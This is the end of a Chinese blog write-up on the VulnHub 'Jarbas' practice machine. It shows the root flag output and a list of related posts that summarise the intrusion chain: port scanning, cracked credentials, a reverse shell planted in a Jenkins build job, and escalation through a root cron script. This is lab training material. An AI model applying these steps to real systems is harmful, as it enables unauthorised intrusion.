[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]#

至此结束!

Sunhaom1
关注
jarbas 靶机渗透(cms 渗透)
m0_63416413的博客
08-29 912
nmap主机发现,扫端口,漏洞脚本扫描发现80端口部署了jakins发现8080端口似乎是一个管理端登录窗口爆破80端口的目录,指定后缀为html,php找到几个账号和密码,在线md5解密,尝试登录后台使用jakins的特性,创建 item 时可写 shell 或 batch, 配合之前的nmap扫描可知服务器linux系统,故写入 shell 脚本kali 监听4444 端口,build 这个 item 拿到一个 shell,这个shell为 /bash/false ,应当提权。
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 487
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
Vulnhub——jarbas
weixin_52512479的博客
11-15 226
其中有eder用户,之前收集到的其中有这一个用户和密码,尝试登录,发现密码是错误的。未发先可利用的漏洞,8080:下存在/robots.txt 可以重点看一下。反弹shell尝试一下,点应用后再进行保存不然有可能会报错。查看存在哪些权限 sudo -l ,发现需要密码,没能成功。发现access.html目录下存在三段编码。-v 显示指令执行过程,输出交互式或错误信息。-n 直接使用IP地址,而不是通过域名服务器。发现root权限每个五分钟执行这条.sh文件。反弹shell,每五分钟输出反弹shell。
Pikachu靶场漏洞实战:文件包含、命令执行、SSRF、CSRF与越权漏洞深度解析
最新发布
tengyuehou的博客
04-07 1063
(1) 选择一个选项,然后提交,发现出现文件包含参数(2) 尝试…/…/…/phpinfo.php,发现不能跳转(3)猜测源码应该是又添加了一个文件夹,所以需要跳转四层文件包含成功(4) 查看源码发现是添加了一个include文件夹。
vulnhub——JARBAS
m0_61619198的博客
07-09 272
vulnhub——JARBAS
【学渗透靶机 ——JARBAS
jieli0901227的博客
04-05 339
通过nmap 扫描结果发现有两个IP,192.168.241.140 为 KALI。这个页面中加密字符串,通过kali工具判断有可能是MD5,passwd 能够查看,而shadow 文件没有查看权限。尝试访问/etcpasswd 和/etc/shadow。使用burp 抓包后台登录界面进行尝试爆破。发现80端口有两个页面,而8080没有。(2)还发现构造项目中可以命令执行。写入反弹shell ,保存后。访问index为默认页面,但是反弹shell没有成功。成功拿到webshell。计划任务中脚本有写权限,
小白渗透之旅——Jarbas靶场(急速版)
qq_52849046的博客
05-30 826
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战。容易被gangan
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 918
这次的靶机vulnhub靶机Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
解决Vulnhub下载的靶机导入VMware后NAT模式无法自动获取IP地址
qq_45722813的博客
11-15 3191
解决Vulnhub下载的靶机导入VMware后NAT模式无法自动获取IP地址 重新启动靶机虚拟机,在启动时按下【shift】键,然后按下【e】进入配置界面,进行相关配置 将ro修改为rw singie init=/bin/bash,然后按Ctrl+X或者【F10】启动虚拟机 开机进入命令行,输入ifconfig查看IP地址,发现什么都没有,这是因为虚拟机网卡没有启用,从而不会分配IP地址,连主机的回环地址127.0.0.1都没有 所以我们需要先输入命令ifconfig -a查看网卡 使用命令vim /
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1389
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 950
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
jarbas--靶机实操详解
qq_61802750的博客
10-12 443
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,攻击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。
红队渗透靶场之Jarbas靶场(超详细)
xf555er的博客
11-26 1587
Jarbas靶场演练, 红队渗透必学靶场
红队靶机jarbas靶机复现,反弹sehll提权,用定时任务来提升至root用户
m0_58116751的博客
05-15 2056
发现靶机IP为192.168.38.134 开放了22,3306,80,8080我们可以进行的远程连接 找他web服务的漏洞,数据库如果能搜寻到泄露的信息也可以进行渗透,80端口有限级较高我们先测试他的web服务,在看下他的8080端口有个登录页面。我们显示发现了他可植入的初始shell在渗透过程中发现了他的权限并不够那我们就要思维拓宽来看他的一些用户,进程,和启动项想办法移动到其它账号之中。我们用cat /etc/crontab来查看他的一个定时任务,他有一个5分钟执行一次的脚本我们来查看他。
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 409
VulnHub的一个靶场
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 2879
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub-Jarbas-wp
yutianovo的博客
09-04 394
靶机描述 http://blog.yutian233.xyz/index.php/ If you want to keep your hacking studies, please try out this machine! Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s. Objective: Get root shell! 下载 https://www.vulnhub.com/entr
Jarbas-靶场
qq_46187131的博客
03-18 1102
首先nmap做端口扫描,发现80和8080两个端口开放通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统通过目录扫描得知账号密码,并成功登录新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限收集提权信息发现自动任务有root权限运行的,并进行利用,写入shell成功拿到root权限,并查看flag。
渗透靶场之Jarbas
m0_56190544的博客
07-09 679
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值